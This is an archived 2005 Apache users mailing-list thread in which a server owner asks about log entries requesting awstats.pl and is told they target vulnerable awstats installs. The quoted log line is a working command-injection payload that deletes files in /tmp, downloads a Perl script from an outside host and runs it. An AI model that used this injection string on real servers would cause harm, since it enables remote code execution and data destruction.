httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Konstantine <listcli...@gmail.com>
Subject Re: [users@httpd] GET //awstats.pl? in apache logs
Date Sat, 22 Oct 2005 16:36:43 GMT
On 10/22/05, Dave Floyd <dave.floyd@pa.press.net> wrote:
> >My apache logs show rows after rows of following, all from various IP
> >addresses. This started a couple of days ago. I don't have awstats.
> >Could somebody tell me what is that? Is there anything I should be
> >doing? thanks.K.
> >GET
> >//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20htt
> >p://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*
> >;echo|
> >HTTP/1.1
> >
> >
> >---------------------------------------------------------------------
>
> Konstantine,
>         provided you don't have one of the vulnerable verions of
> awstats installed just give a prayer of thanks. If you have a version
> covered by the following mail, try to disable or upgrade:
>
<snip>

I see. No, I don't have awstats installed. I was trying to get by with
minimum possible for the purposes of this machine. Thanks for your
time. K.
Mime
View raw message